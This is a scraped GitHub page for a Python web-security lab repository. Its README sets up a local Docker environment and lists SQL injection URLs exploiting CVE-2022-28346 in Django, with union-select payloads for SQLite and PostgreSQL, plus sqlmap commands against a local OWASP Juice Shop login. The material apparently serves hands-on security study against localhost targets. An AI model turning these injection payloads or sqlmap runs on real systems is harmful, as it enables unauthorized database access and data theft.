python-web-security

$ chmod +x db/init-db.sh

$ docker-compose build
$ docker-compose up -d

# cve 2022 28346
http://localhost:8000
http://localhost:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --

http://localhost:8000/demo?field=demo.name" FROM "demo_user" --
http://localhost:8000/demo?field=demo.name" FROM "demo_user"; --

# Postgresql
http://localhost:8000/demo?field=demo.name" FROM "demo_user" GROUP BY "demo_user"."id","demo_user"."name" union select 1, 'hacked', 3 --
http://localhost:8000/demo?field=demo.name" FROM "demo_user" GROUP BY "demo_user"."id","demo_user"."name" union select 1, version(), 3 --

SQLMAP

$ python sqlmap.py -u "http://localhost:3000/rest/user/login" --data="email=user@example.com&password=test" --ignore-code=401

$  python sqlmap.py -u "http://localhost:3000/rest/user/login" --data="email=user@example.com&password=test" --ignore-code=401 --level=5 --risk=3 --dbms=sqlite

juice-shop

http://localhost:3000

Name		Name	Last commit message	Last commit date
Latest commit History 16 Commits
.devcontainer		.devcontainer
.vscode		.vscode
cve_2022_28346		cve_2022_28346
db		db
simple_sql_injection_app		simple_sql_injection_app
.env.example		.env.example
.flake8		.flake8
.gitignore		.gitignore
README.md		README.md
docker-compose.yml		docker-compose.yml
query.txt		query.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

.devcontainer

.devcontainer

.vscode

.vscode

cve_2022_28346

cve_2022_28346

db

db

simple_sql_injection_app

simple_sql_injection_app

.env.example

.env.example

.flake8

.flake8

.gitignore

.gitignore

README.md

README.md

docker-compose.yml

docker-compose.yml

query.txt

query.txt

Repository files navigation

python-web-security

SQLMAP

juice-shop

About

Releases

Packages

Languages

shimakaze-git/python-web-security

Folders and files

Latest commit

History

Repository files navigation

python-web-security

SQLMAP

juice-shop

About

Resources

Stars

Watchers

Forks

Languages